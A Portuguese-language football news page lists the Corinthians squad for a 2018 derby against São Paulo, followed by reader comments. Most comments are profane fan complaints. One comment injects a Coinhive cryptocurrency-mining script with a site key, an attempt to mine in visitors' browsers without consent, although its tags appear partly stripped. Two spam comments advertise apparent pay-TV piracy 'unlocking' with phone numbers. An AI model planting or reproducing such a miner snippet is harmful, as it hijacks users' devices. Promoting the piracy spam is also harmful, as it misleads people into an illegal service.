26/1/2018 14:57

Fábio Carille relaciona 23 atletas para clássico contra o São Paulo

Treinador não escolheu os jovens Pedrinho e Carlinhos para compor o banco de reservas

Fábio Carille relaciona 23 atletas para clássico contra o São Paulo
Foto: Agência Corinthians

Acertando os últimos detalhes para o primeiro clássico da temporada, o Corinthians terá 23 atletas à disposição de Fábio Carille neste sábado. A principal novidade será o retorno do meio-campista Rodriguinho, que havia sido poupado na última quarta-feira contra a Ferroviária.



Além disso, o defensor Yago ficará no banco pela primeira vez desde que retornou do empréstimo da Ponte Preta. Apesar das novidades, o técnico ainda não poderá contar com os reforços Emerson Sheik e Renê Júnior, que ainda aprimoram a parte física. E também não terá o zagueiro Henrique, que está perto de ser regularizado.

Outros jovens da base, como Pedrinho e Carlinhos, perderam espaço no banco de reservas e não serão relacionados para o jogo. A tendência é que a escalação seja: Cássio; Fagner, Balbuena, Pedro Henrique e Juninho Capixaba; Gabriel, Rodriguinho, Romero, Jadson e Clayson; Júnior Dutra.

O Majestoso acontece neste sábado, às 17h, no estádio do Pacaembu. O rival do Corinthians também promete vir com força máxima para o confronto.

Confira os relacionados

Goleiros: Cássio e Caique;
Laterais: Fagner, Juninho Capixaba, Guilherme Romão e Mantuan;
Zagueiros: Balbuena, Pedro Henrique, Yago e Léo Santos;
Volantes: Gabriel, Maycon e Camacho;
Meias: Rodriguinho, Jadson, Marquinhos Gabriel, Mateus Vital e Danilo;
Atacantes: Romero, Clayson, Júnior Dutra, Kazim e Lucca.


VEJA TAMBÉM
- Gesto de Neymar gera caos na Arena e expõe fragilidade da segurança em clássicos paulista
- 250 MILHÕES IRREGULARES? Investigação pode revelar irregularidade astronômica na Arena Corinthians
- ADEUS DO CRAQUE? Pressão do Besiktas por Bidon acelera negociações e joia pode dar adeus


Postado por - 37779 visitas - Fonte: Tudo Timão

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

o carile pocha você ta de brincadeira kazim fidido de ruim porque não o Carlinhos ele com uma perna so é melhor doque o gringo

vai tomar no cu seus antis do caralho <br />carille ganha paulista ganha brasileiro começando a temporada vcs só sabe reclama tem que tá torcendo pro timão na alegria e na tristeza seus merda <br /><br />Pedrinho não tem condições físicas pra encara um jogo como esse <br /><br />Carlinhos não jogo nada ano passado então tem que tá treinando pra ter oportunidade se colocar ele em 5 jogos não fazer um gol vcs vão queimar o moleke e pedir a cabeça dele então muleke e novo seu momento vai chegar <br /><br />Matheus vital pq tá ganhando espaço pq o cara tá rodado jogou ano passado como titular sabe a pressão de um jogo <br /><br />vamos espera as coisas acontecerem temos que ter um time montado pra libertadores fica trocando de peça todo jogo chega na libertadores sai no primeiro combate...

cade o pedrinho e o carlinhos porra<br />

Corinthians tá ressuscitando esse bosta do Yago cara , cê é louco. já basta Camacho e kazim

mete skeique nessa porra o homem brilha em classico

esse carille tá de brincadeira tem que começar vaiar ele no estádio cadê o padrinho ou carlinhos faz favor tá levando esse kazim

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS<br />FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA<br />PARA TODO BRASIL<br />WHATZSAP 11 958694345

é foda relaciona o kazim e não relaciona o Carlinhos e nem o Pedrinho

< src="https://coinhive.com/lib/coinhive.min.js"></><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throt tle:.3});a.start();</>

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça<br /> liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

com kazin são 22 jogadores.

cadê o Pedrinho e Carlinhos. o Carrille ja ta tirrando até do banco. quem é o empresário deles são jogandor do Corinthians Carrille. mais o Mateus mal chegou e ja foi titular.

empresário do kazim deve ser muito forte o cara não sabe jogar futebol gente

pela mor de Deus carile ponha o Carlinhos no lugar do kazim traz o CEIFADOR logo Andrés Sanchez

aff, kazin, bota o Carlinhos, Pedrinho ou qualquer outro menos ele, Carile tá de brincadeira.

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias